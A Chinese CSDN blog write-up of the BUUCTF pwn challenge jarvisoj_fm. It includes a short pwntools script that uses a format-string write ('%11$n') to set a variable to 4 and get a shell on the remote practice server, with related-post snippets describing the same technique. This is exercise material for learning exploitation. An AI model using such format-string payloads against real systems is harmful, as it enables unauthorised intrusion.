jarvisoj_fm【BUUCTF】

最新推荐文章于 2023-07-11 21:10:41 发布
最新推荐文章于 2023-07-11 21:10:41 发布
阅读量273 收藏
点赞数
分类专栏: Linux PWN CTF训练 文章标签: 安全 linux PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696518/article/details/126630760
版权
CTF训练 同时被 3 个专栏收录
46 篇文章 14 订阅
订阅专栏
Linux
37 篇文章 0 订阅
订阅专栏
PWN
37 篇文章 3 订阅
订阅专栏

在这里插入图片描述
开启了NX、canary,动态编译,32位,IDA分析:
在这里插入图片描述
很明显为格式化字符串漏洞,将x设为4即可

from pwn import *
# io = process("./fm")
io = remote("node4.buuoj.cn",29788)
x_addr = 0x0804A02C
payload = p32(x_addr) + b'%11$n'
io.sendline(payload)
io.interactive()
Mokapeng
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
STM32F103_FM17550.rar
11-12
STM32F103用FM17550,读写RF A 卡,B卡,STM32F103的5个串口通讯,USB通讯,实测可用,自己整合的。欢迎下载,修正。
FM.rar_FM_fm matlab_modulation
09-21
This is an FM Matlab Code.
BUU刷题-Pwn-jarvisoj_fm
一个啥也不会的小菜鸡!
07-11 201
参数位置:从esp的下一个地址为第一个参数。格式化字符串漏洞,改变函数的值。%idx$n:修改某位置的内存。%numc:表示字符串长度。
BUUCTF pwn——jarvisoj_fm
CNS-Enterprise BCC-1701-J
04-13 200
BUUCTF 做题练习
jarvisoj_fm
小白垃圾笔记2
05-20 721
fmtstr_payload(offset,writes,numbwritten=0,write_size='byte')
[BUUOJ]jarvisoj_fm
Do1phln的博客
11-07 204
checksec为常规保护,进入IDA分析main逻辑内部判断本题应该是格式化字符串漏洞,因此进行gdb调试,下断点在漏洞printf。查找具体存储位置,发现是在第11位开始存储,所以据此构造exp。处,输入一串字符串后在gdb内。
JarvisOJ fm
PLpa的博客
07-09 1047
这一题是一道格式化字符串漏洞题 关于格式化漏洞的基础,你可以看我前面的博客,里面有提到:https://blog.csdn.net/qq_43986365/article/details/94896862 拿到这一题,我们仍然是先查看保护: 我们可以看到,简单的格式化漏洞题只开了NX和CANARY保护,好的。 接下来我们就可以进入IDA中看一下程序的具体逻辑: 在这里,我们可以看到有一个明显的...
[BUUCTF]PWN——jarvisoj_fm
BangSen1的博客
03-19 313
jarvisoj_fm 例行检查,开启NX和CANARY保护,32位。 运行程序 IDA载入,检索字符串,看见了“/bin/sh”字符串 跟进函数,当x=4的时候执行system(/bin/sh) 存在格式化字符串漏洞,我们可以利用它随意读写的特性让x=4 找一下输入点的参数在栈上存储的位置,手动输入计算得到偏移为11 payload=p32(x_addr)+"%11$n" 首先传入x参数的地址,这个地址存放在栈上偏移为11的位置,利用%11$n,定位到了偏移为11的位置,往这个位置写入数据,写
FM.zip_FM_FM matlab
09-23
FM的M文件,是基于MATALB环境下运行的
FM.rar_FM_FM modulation_modulation
07-15
matlab model fm modulation
FM-test.rar_FM_fm test
09-23
TEA5767收音机程序,希望能够对大家有一点用处啦
MFOJ #353. Hello, World!
Jacky0513z的博客
10-15 351
Hello, World!
【CTF】jarvisoj_fm 1
凉水的博客
07-06 509
jarvisoj_fm
BUUCTF ciscn_2019_ne_5 & jarvisoj_fm
红叶的博客
11-01 684
只开起了部分RELRO与NX。IDA中发现4个函数mainGetFlagAddLog主要只需要看这3个函数。
[PWN] BUUCTF jarvisoj_fm
空城惜梦的博客
06-05 381
[PWN] BUUCTF jarvisoj_fm 按照惯例checksec ,开启了relro,canary,nx 执行程序,观察程序的逻辑,在打印出输入的字符后,会打印出3! 32IDA打开查看主要函数main,观察到在红框那里存在的很明显的格式化字符串漏洞,而且当x==4时,会得到flag,根据之前执行的程序可知,未修改x之前x的值为3,则若要修改x,需要利用格式化字符串漏洞的任意地址读写 解题思路 利用 "AAAA %08x %08x %8x %08x %08x %08x %08x………… ",
BUUCTF-jarvisoj_fm1-WP
Rt1Text的博客
10-30 234
有canary ,题目提升fm,考虑格式化字符串。
BUUCTF 刷题 jarvisoj_fm
Helloity的博客
02-13 352
题目:BUUCTF在线评测 checksec一下,32位程序,有canary,开NX Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x8048000) 放到ida里f5一下,发现一个明显的printf格式化字符串漏洞,我们需要控制x的值为4,就可以获得binsh int __cd
login_window_fm
最新发布
07-13
您提到的 "login_window_fm" 可能是指登录窗口的相关代码。以下是一个简单的使用Python和Tkinter库创建登录窗口的示例: ```python from tkinter import * def login(): username = entry_username.get() password = entry_password.get() # 在此处添加验证用户名和密码的逻辑 if username == "admin" and password == "admin": lbl_result.config(text="登录成功", fg="green") else: lbl_result.config(text="用户名或密码错误", fg="red") # 创建主窗口 window = Tk() window.title("登录窗口") # 创建标签和输入框 lbl_username = Label(window, text="用户名:") lbl_username.pack() entry_username = Entry(window) entry_username.pack() lbl_password = Label(window, text="密码:") lbl_password.pack() entry_password = Entry(window, show="*") entry_password.pack() # 创建登录按钮和结果标签 btn_login = Button(window, text="登录", command=login) btn_login.pack() lbl_result = Label(window, text="") lbl_result.pack() # 运行主循环 window.mainloop() ``` 这段代码使用Tkinter库创建一个简单的登录窗口。用户需要在用户名输入框和密码输入框中输入相应的信息,然后点击登录按钮进行验证。如果用户名和密码为 "admin",则显示登录成功,否则显示用户名或密码错误。 请注意,这只是一个简单的示例,仅用于演示如何创建登录窗口。在实际应用中,您需要添加适当的验证逻辑和安全措施来保护用户的信息安全。 希望对您有所帮助!如果您有任何其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值